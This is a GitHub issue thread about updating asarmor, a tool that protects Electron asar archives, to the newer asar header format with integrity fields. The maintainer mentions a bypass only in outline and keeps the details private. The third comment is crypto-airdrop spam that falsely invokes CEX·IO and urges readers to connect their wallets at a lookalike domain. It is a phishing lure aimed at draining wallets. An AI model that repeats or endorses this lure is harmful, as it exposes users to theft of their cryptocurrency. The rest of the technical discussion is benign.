### ISSUE TITLE
Update to the latest asar format (`integrity`, `executable`, etc. in header)

### ISSUE THREAD

**Issue by sleeyax** [sleeyax/asarmor#43]
The asar spec has been updated over time, while asarmor hasn't been updated with it yet. For example we currently don't include things like `integrity` checks in the header. While this isn't breaking any applications that depend on asarmor, it makes bypassing patches trivial.

See https://github.com/electron/asar#format for the implementation.

**Comment by burgil** [comment]
hey!
Any progress on that? how can we help?
Also, how exactly do you bypass it so trivially please?
Maybe exposing the ways you bypass it will help us find ways to enforce it, you know, share the secrets and we will help secure them?

**Comment by sleeyax** [comment]
>  Any progress on that? how can we help?

No one is assigned to this issue, so no one is working on this yet.

>  how can we help?

Asarmor needs to be updated to match the latest asar spec (see link in the issue) so that it writes the latest expected fields to the outptut asar header when patches are applied. Basic understanding of how asarmor works is required, so start by checking out the [source code](https://github.com/sleeyax/asarmor/tree/master/src) and unit tests. You can safely ignore the `encryption` module; that should be unaffected by these kind of changes.

>  Also, how exactly do you bypass it so trivially please?

Well, someone could just fork `asar` and modify the code that iterates over the header and skip all sections that don't have a `integrity` field or any other field that is defined in the latest spec.

>  Maybe exposing the ways you bypass it will help us find ways to enforce it, you know, share the secrets and we will help secure them?

I don't think exposing bypasses in detail in public is a good idea because some developers depend on asarmor to secure their (often proprietary) software. If you're serious about this and want to help improving asarmor we can chat about this in private though.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by sleeyax** [comment]
Out of scope since https://github.com/sleeyax/asarmor/releases/tag/v3.0.0.

There's currently only one 'old school' patch that remains, which is `bloat`. This patch can't use any of the `integrity` features of the asar format to begin with so it's pointless to support this at this point in time.
